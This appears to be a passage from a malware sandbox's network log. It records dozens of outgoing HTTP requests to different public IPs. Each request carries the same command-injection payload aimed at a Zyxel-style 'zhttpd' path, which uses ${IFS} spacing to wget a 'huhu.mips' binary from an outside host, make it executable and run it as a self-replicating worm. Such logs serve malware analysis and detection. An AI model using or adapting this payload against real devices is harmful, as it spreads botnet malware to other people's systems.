                                      Jan 19, 2024 17:29:51.141552925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8951192.168.2.143850691.176.51.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141571045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8952192.168.2.14332085.139.216.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141602039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8953192.168.2.145971219.242.5.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141633034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8954192.168.2.144289425.241.245.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141695023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8955192.168.2.1455790200.122.34.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141727924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8956192.168.2.1458420200.54.141.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141756058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8957192.168.2.1435562175.229.14.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141817093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8958192.168.2.145818843.240.30.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141841888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8959192.168.2.1447556206.20.178.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141880035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8960192.168.2.145215088.175.48.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141912937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8961192.168.2.1459722172.167.76.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141937017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8962192.168.2.1433528118.98.161.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.141999006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8963192.168.2.143896043.27.41.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142035007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8964192.168.2.1444974145.97.150.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142069101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8965192.168.2.146055473.12.52.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142118931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8966192.168.2.143792651.212.67.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142160892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8967192.168.2.1453566102.133.239.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142178059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8968192.168.2.1460196177.60.79.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142208099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8969192.168.2.143436269.101.135.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142257929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8970192.168.2.143401676.171.105.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142301083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8971192.168.2.145389674.88.132.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142355919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8972192.168.2.1444318199.108.135.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142379045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8973192.168.2.1438846201.189.95.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142436028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8974192.168.2.1458934123.119.155.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142477989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8975192.168.2.1441306187.34.141.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142504930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8976192.168.2.145260074.185.233.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142539024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8977192.168.2.1437176113.146.205.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142561913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8978192.168.2.145142472.79.126.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142616987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8979192.168.2.144195439.62.43.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142633915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8980192.168.2.14514509.39.209.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142683029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8981192.168.2.144246859.181.145.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142709017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8982192.168.2.145070496.58.235.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142765999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8983192.168.2.1440330202.148.193.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142807961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8984192.168.2.14370521.97.55.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142847061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8985192.168.2.1442924202.109.207.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142882109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8986192.168.2.1443046192.243.91.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142929077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8987192.168.2.1443346148.113.153.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142944098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8988192.168.2.14521969.124.106.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142973900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8989192.168.2.14513965.174.120.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.142987013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8990192.168.2.1451154176.50.108.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143030882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8991192.168.2.144938686.180.218.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143071890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8992192.168.2.143361017.75.32.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143110991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8993192.168.2.1451808134.94.201.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143135071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8994192.168.2.1458072209.131.100.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143176079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8995192.168.2.146010648.223.143.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143222094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8996192.168.2.1442416185.18.12.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143254042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8997192.168.2.1454334126.26.109.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143289089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8998192.168.2.1444062165.133.229.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143302917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8999192.168.2.143568448.210.84.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143340111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9000192.168.2.1449662144.204.105.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143374920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9001192.168.2.1440158152.207.36.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143404007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9002192.168.2.14333388.127.134.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143440962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9003192.168.2.144873893.57.45.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143482924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9004192.168.2.1459154199.54.247.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143517017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9005192.168.2.1440540209.149.35.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143532991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9006192.168.2.145339279.154.160.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143583059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9007192.168.2.143526450.46.125.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143604040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9008192.168.2.144745884.207.224.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143646955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9009192.168.2.1437758145.104.152.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143690109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9010192.168.2.1444328132.215.27.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143696070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9011192.168.2.145338253.141.221.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143748999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9012192.168.2.1444762178.91.211.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143776894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9013192.168.2.1457794104.71.204.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143832922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9014192.168.2.1440164193.17.216.13443
                                      TimestampBytes transferredDirectionData
